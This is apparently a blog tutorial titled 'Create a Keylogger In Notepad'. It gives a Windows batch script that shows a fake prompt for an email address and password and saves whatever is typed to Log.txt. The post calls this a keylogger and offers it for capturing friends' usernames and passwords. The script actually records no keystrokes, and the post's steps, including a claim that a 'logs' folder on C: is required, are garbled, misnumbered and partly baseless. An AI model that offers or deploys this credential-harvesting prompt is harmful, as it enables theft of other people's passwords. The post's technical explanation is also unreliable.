Create a Keylogger In Notepad How To :Â Today we are here to share you about keylogger create in notepad also as you know A keylogger is a type of surveillance software that has the capability to record every keystroke you make to a log file, usually encrypted.Â Every type of keylogger is dangerous as they can record your keystrokes,tracks your activity and can record the open sites. By this your any account can be easily hacked by the hackers. These keyloggers can detects your bank accounts passwords too. And these type of keylogger can also be created with the notepad text editor.Â
The method is very simple and easy and you donâ€™t need any tool to this just a notepad and a little code given below is enough for this. So just follow the post below to proceed.
Creating Keylogger With Notepad
- First of all you need to open notepad in your windows by pressingÂ WindowÂ button and then enteringÂ notepad.
- Now in notepad copy and paste the below code in it.
echo Please Enter Your Email Address And Password
set /p user=Username:
set /p pass=Password:
echo Username=â€%user%â€ Password=â€%pass%â€ >> Log.txt
start >>Program Here<<
3 . Now save this file as Logs.batÂ in your desktop.
4. Â Now create a new folder namedÂ logs. (Note that keylogger will only work if the folder name isÂ logs).
5. Â Cut this folder and paste it into drive C: .
7. Thats it you are done, you have successfully created a keylogger in notepad
Create a Keylogger In Notepad How ToÂ : Its all about you i hope you will like this article so by With this method you can easily record out the keystrokes of your keyboard that had been entered in the batch file. And you also use it to shocks your friends by telling them their user name and password with this. Hope you like the post, donâ€™t forget to share and leave a comment below if you have any related query.